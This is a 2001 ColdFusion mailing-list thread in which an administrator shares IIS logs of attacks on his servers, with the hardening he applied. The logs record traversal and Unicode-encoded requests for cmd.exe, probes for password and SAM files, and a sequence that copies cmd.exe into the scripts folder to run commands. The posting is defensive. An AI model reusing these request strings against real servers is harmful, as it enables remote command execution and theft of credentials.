RE: Log files of a web attack.

Erika L Walker Tue, 08 May 2001 21:06:43 -0700
This was the exact hack on my client's server. The log files were almost
identical....just different IP addresses.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 9:52 PM
To: CF-Talk
Subject: OT: Log files of a web attack.


Hi,

I thought the group would like to see the techniques of a recent attack on
our web servers. They've been doing this a couple times a day for a week.
UUNet (their ISP) is slow in doing stopping them.

To secure IIS we've removed all extensions except cfm. We've taken out all
the iis folders and files like /mdac, /scripts and /printers. We've secured
cfide folder with passwords including locking out the user after a couple
failed attempts and log the failures. Lastly, we've remove all permissions
from cmd.exe.

This has kept them out to date. Any additional ideas are welcomed. Non of
this is top secret info, the hackers already know it, but do you and are you
protected?

HTH,

Rick Moon


2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET
/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET
/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
/scripts/..Á.../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
/scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
/scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 200.245.48.155 - myIP GET
/scripts..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET
/iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET
/cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET
/samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET
/_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET
/adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe -
404 -
2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd -
404 -
2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd -
404 -
2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd -
404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat -
404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr -
404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr -
404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr -
404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr -
404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr -
404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr -
404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr -
404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr -
404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr -
404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe -
404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl -
404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe -
404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe -
404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe -
404 -
2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA -
404 -
2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD
/msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD
/adsamples/config/site.csc - 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll
http/dir 404 -
2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD
/AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/openfile.cfm - 401 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/ExprCalc.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/displayopenedfile.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/sendmail.cfm - 401 -
2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl -
404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ -
404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe -
404 -
2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe -
404 -
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe -
404 -
2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe -
404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc -
404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll -
404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe -
404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD
/officescan/cgi/jdkRqNotify.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir
404 -
2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe -
404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw
CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD
/_vti_bin/_vti_aut/dvwssr.dll - 404 -
2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET
/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET
/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET
/scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET
/scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe -
404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe -
404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD
/_vti_pvt/administrators.pwd - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP HEAD
/samples/search/queryhit.htm - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
/iissamples/exair/howitworks/codebrws.asp - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
/iissamples/sdk/asp/docs/codebrws.asp - 404 -
2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
This is the really bad one.
2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET
/scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot

end.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
RE: Log files of a web attack.

Reply via email to
